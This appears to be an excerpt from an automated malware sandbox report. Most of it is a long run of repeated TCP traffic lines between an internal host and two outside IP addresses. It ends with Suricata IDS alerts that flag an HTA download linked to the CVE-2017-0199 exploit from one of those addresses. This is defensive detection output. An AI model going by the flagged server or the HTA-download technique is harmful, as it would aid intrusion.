                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.136:80 -> 192.168.2.22:49164
